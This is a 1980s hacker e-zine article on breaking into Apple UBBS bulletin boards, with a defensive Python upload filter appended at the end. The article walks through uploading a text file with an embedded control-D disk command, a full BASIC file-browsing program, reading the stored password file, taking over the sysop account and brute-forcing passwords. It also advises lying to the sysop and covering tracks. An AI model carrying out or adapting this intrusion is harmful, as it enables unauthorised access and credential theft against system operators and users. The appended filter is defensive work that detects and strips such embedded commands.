=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=               Volume 1 , P/HUN Issue #2 , Phile #3 of 9                     =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Defeating Security on Apple's UBBS
----------------------------------

Written by Evil Mind of CTG
Computer Terrorists Guild

Introduction
-------------

Hello fellow hackers and phreakers, I'm here to tell you all about Apple's UBBS. This is a nice little program that gives any Apple computer with a modem the ability to be a BBS. It can be on any storage device, from a 5.25 disk to a chain of hard drives. I doubt any hackers or phreakers are using this program, because everyone (in Apple's world) uses GBBS. So, let's get down to business.

For flexibility, UBBS has been written in BASIC. For our convenience, hackers with a knowledge of universal BASIC (or better yet, knowledge of Apple BASIC) will have a good time. The only catch is that control-C (which breaks BASIC programs) is screened out by an ML routine before it hits BASIC. But no need to fear; hacking it is discussed later.

When a sysop first uses a UBBS program, the sysop must run the program SYSGEN, which is for System Generation, the "Creator Program" for the board. It asks for the name of the board, the sysop's name, the bulletins' names, and other things needed before the next program is run: LOGON, which then puts the computer in answer mode.

Let's say some guy calls a few days later. The LOGON program will then display a BBS title, then something like "Enter your name or press <RETURN> for NEW." So, this guy does a <RETURN> for new, questions are asked, and then the sysop validates him. Normal procedure, like any other BBS program.

Hacking it
-----------

Once in the system, get access to the <F>eatures section, which hopefully has an up/downloading section. If they give a lame excuse for not giving it to you because of an IBM, lie in the validation part and say you own an Apple. First, upload some text file...
like a list of BBS numbers. If the file needs to be validated by the sysop before further access from the public, then it will be hard to hack it out. (Explained later.) Now, at least you have some access... hopefully the u/d ratio is 1:1 or better. So, upload two more files!

File #1
--------

This is the most important file in the hacking process. This file should contain the following or something similar to it:

(=) This is a TEXT file.
------------------------------------------------------------------------------
THIS IS A POEM
CAT
RAT
DOG
PAT
BY MR. WALTHER
------------------------------------------------------------------------------

File explained: Well, the control-D is needed. If you can't enter it from your word processor, then enter "DCAT" and go in with a disk editor and change the character D into hex $04, which is a control-D to Apple. Normally, control-D is used within programs to run disk commands from BASIC. When viewed, the file will catalog the current storage device (hard, 3.5, or 5.25) and the board will be stuck in a "zombie" mode. Also, when downloading this file, view it, don't use Xmodem. But upload file #2 with it, so you can hack in one call and delete your tracks.

File #2
--------

Well, this program is supposed to be BASIC, but since a lot of hackers I know have IBMs, I'll make it hackable from both Apple and IBM. Make the following a TEXT, that's right, text file.

------------------------------------------------------------------------------
5 REM CHR$(4) IS CONTROL-D, THE DISK COMMAND PREFIX
10 ONERR GOTO 1000
20 HOME
30 PRINT "A DISK PREFIXER"
40 PRINT
50 PRINT "<P>REFIX <C>ATALOG <V>IEW <D>ELETE <R>UN"
60 INPUT A$
70 IF A$<>"P" AND A$<>"p" THEN 100
80 PRINT "PREFIX WHAT? (RETURN FOR LIST, OR FOLLOW EXAMPLE: /HARD1/BBS)"
90 INPUT A$: PRINT CHR$(4);"PREFIX ";A$: GOTO 40
100 IF A$<>"C" AND A$<>"c" THEN 120
110 PRINT CHR$(4);"CATALOG": GOTO 40
120 IF A$<>"D" AND A$<>"d" THEN 150
130 PRINT "DELETE WHAT FILE?"
140 INPUT A$: PRINT CHR$(4);"DELETE ";A$: GOTO 40
150 IF A$<>"R" AND A$<>"r" THEN 180
160 PRINT "RUN WHICH FILE?"
170 INPUT A$: PRINT CHR$(4);"RUN ";A$: GOTO 40
180 IF A$<>"V" AND A$<>"v" THEN PRINT "NOT A COMMAND": GOTO 40
190 PRINT "VIEW WHICH FILE?"
200 INPUT A$: PRINT CHR$(4);"OPEN ";A$: PRINT CHR$(4);"READ ";A$
210 ONERR GOTO 230
220 INPUT B$: PRINT B$: GOTO 220
230 PRINT CHR$(4);"CLOSE ";A$: ONERR GOTO 1000
240 GOTO 40
1000 PRINT "ERROR!": CALL -1370
------------------------------------------------------------------------------

Upload the files. When asked about file #2, say it's a TXT file.

Now view file #1. It will catalog (or DIR) the disk, and then be in a "zombie" state. This is when BASIC thinks the disk is still being read, and is really stuck, waiting for you to enter things. To clear that up: the INPUT command is used either for keyboard input or, in the correct conditions (that UBBS uses), for disk input from text files! If you can't see it yet, press a control-D and a disk command.

The real intention is to run file #2, which will do the hacking. But File #2 and File #1 might be in a different directory than the transfer program. Use these commands (with a control-D before them):

CAT to see what is on the disk.
Example:

]CAT

/HARD1                                (PREFIX NAME)

PROGRAMS         DIR  10-NOV-88   2
PRODOS           SYS  06-APR-81  32
BASIC.SYSTEM     SYS  07-APR-81  20
BASIC.PROGRAMS   BAS  10-NOV-88   5
ML.PROGRAMS      BIN  10-NOV-88   7
READ.ME          TXT  10-NOV-88  10

In which case, you should explore further with a

]PREFIX /HARD1/PROGRAMS
]CAT

/HARD1/PROGRAMS

LOGON            BAS  10-APR-84  54
SYSOP            BAS  10-APR-84  34

Once you explore enough to find your files, do an:

]EXEC file#2

Replace "file#2" with whatever you named the second file.

Note: exploring will take a long time, because you might need to find some other things to interest you, like the logon program (which can be in another directory). When exploring in the zombie state, the computer sometimes zaps out back into normal running mode. Re-download and start where you left off.

Then it'll go:

A DISK PREFIXER

<P>REFIX <C>ATALOG <D>ELETE <V>IEW <R>UN
?

Then enter the desired one, in this case "P", and press enter. Here's how to work them:

Examples: from BASIC

]PREFIX /HARD1/FILES   (to get to the directory /hard1/files)
]PREFIX /HARD1/        (to get back to /hard1)
]PREFIX                (tells you what the current prefix is)
]CATALOG               (DIR a disk for you)
]RUN LOGON             (Go back to LOGON program)

View is a different thing, and can't be done from BASIC. In this case, choose "V" for view (beforehand, find the userinfo file, a text file). And when it goes:

VIEW WHICH FILE?
?

type in a pathname.... example:

VIEW WHICH FILE?
?/HARD1/BBS/USERINFO.DATA

and it'll show the passwords.

Explore! There are a lot of things to do. One last word before you finish: the sysop is 001. Find his password, log in as him, then make all your accounts from there (because he validates and creates accounts).

The form for UBBS passwords is NNNCCCC, where N is a number and C is a character. Example: 001SYSOP. Also, 001SYSOP is the default password? (I'm not sure, but I think it is.) Try it on a new board and see if the sysop didn't change it yet.

So if your victim board doesn't have the requirements, just use a password scanner and try out 001AAAA, 001AAAB and all, and eventually you can get it in a matter of weeks. (No lowercase or control characters are accepted by UBBS.)

All in a nutshell, here's another example:

------------------------------------------------------------------------------
Welcome to a UBBS system.

Enter name or press return for new users
XXXXXXX
checking password.

Hello Mr. Bill, today is 00/00/00

news for today:
This is a new board and hope ya enjoy it,
Your sysop, Tom Hacket.

No Email waiting
Email>Quit

Main level:
B/A/G/J/N/F/Q/Help >Features

loading xfer, please wait...

Xfer command> Upload
choose protocol: X>modem T>ext
Xmodem
(upload files)
70 blocks recieved....
Information:
What is file#1's type: TXT
What is file#2's type: TXT
Thank you.

Xfer command> Download
Download what file?
TEST.UPLOAD                           (file#1)

THIS IS A POEM

/HARD1/ONLINE

CALLER.LOG    06  TXT
USER.INFO     65  TXT
LOGON         45  BAS
SYSGEN        65  BAS
TEST.UPLOAD   02  TXT
PREFIXER      03  TXT
LEECHES       02  TXT

(Zombie state)
(control-D)EXEC PREFIXER(return)

A DISK PREFIXER

<C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX
?B
NOT A COMMAND!

<C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX
?V
VIEW WHICH FILE?
?USER.INFO
(list of passwords)

<C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX
?R
RUN WHICH FILE?
?LOGON

(Automatically hangs up, you re-call, then log in as sysop, and make another account with good access.)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

DOWNLOADED FROM P-80 SYSTEMS 304-744-2253
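
The File #1 trick described above works because the board prints uploaded bytes straight to the BASIC output stream, where control-D ($04) is an in-band disk-command prefix. As an added example (not part of the original phile or of UBBS), this Python screen shows how a file-transfer front end can flag and neutralize such bytes before an upload is ever displayed; the function names, the constructed sample upload, and the handling of a high-bit ($84) control-D are assumptions.

```python
CTRL_D = 0x04                     # the phile's "hex $04": disk-command prefix when printed
ALLOWED_CONTROLS = {0x0D, 0x0A}   # CR / LF line endings are the only controls kept

# Constructed sample modelled on the phile's File #1 (CR line endings assumed).
SAMPLE_UPLOAD = b"THIS IS A POEM\r\x04CAT\rRAT\rDOG\rPAT\rBY MR. WALTHER\r"


def _low7(byte: int) -> int:
    """Strip bit 7. Assumption: some Apple II text is stored with it set."""
    return byte & 0x7F


def find_embedded_commands(data: bytes) -> list[tuple[int, str]]:
    """Return (line_number, text_after_control_D) for each line holding a control-D."""
    text = bytes(_low7(b) for b in data).replace(b"\r\n", b"\r").replace(b"\n", b"\r")
    findings = []
    for number, line in enumerate(text.split(b"\r"), start=1):
        pos = line.find(bytes([CTRL_D]))
        if pos != -1:
            findings.append((number, line[pos + 1:].decode("ascii", "replace")))
    return findings


def neutralize(data: bytes) -> bytes:
    """Drop every control byte except CR/LF so no in-band command survives display."""
    out = bytearray()
    for b in data:
        low = _low7(b)
        if low in ALLOWED_CONTROLS or 0x20 <= low < 0x7F:
            out.append(b)
    return bytes(out)


def screen_upload(data: bytes) -> tuple[bytes, list[tuple[int, str]]]:
    """Return the safe-to-display bytes plus findings for the sysop's review log."""
    return neutralize(data), find_embedded_commands(data)


if __name__ == "__main__":
    clean, findings = screen_upload(SAMPLE_UPLOAD)
    for number, command in findings:
        print(f"line {number}: embedded disk command {command!r}")
    print(clean)
```

Running the same `neutralize` step at display time as well as at upload time also covers files that were stored before any screening existed.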